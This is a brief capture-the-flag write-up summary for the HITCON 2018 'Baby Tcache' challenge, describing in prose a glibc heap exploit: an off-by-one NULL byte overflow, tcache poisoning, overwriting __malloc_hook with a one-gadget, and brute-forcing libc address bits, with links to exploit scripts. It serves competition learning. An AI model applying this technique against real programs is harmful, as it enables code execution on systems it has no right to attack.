Rating:

Get overlapping chunks thanks to a off-by-one NULL byte overflow, use them to poison tcache and allocate chunks at arbitrary addresses, and finally overwrite `__malloc_hook` with the address of a one-gadget. Since we didn't think leaking data was possible (spoiler: it was—check out the [intended solution](https://github.com/scwuaptx/CTF/blob/master/2018-writeup/hitcon/baby_tcache.py) or the [write-up by bi0s](https://ctftime.org/writeup/11945)), we bruteforced 12 bits of libc addresses (doable, but not for the faint of heart :D).

Original writeup (https://github.com/integeruser/on-pwning/blob/master/2018-hitcon/Baby-Tcache/baby_tcache.py).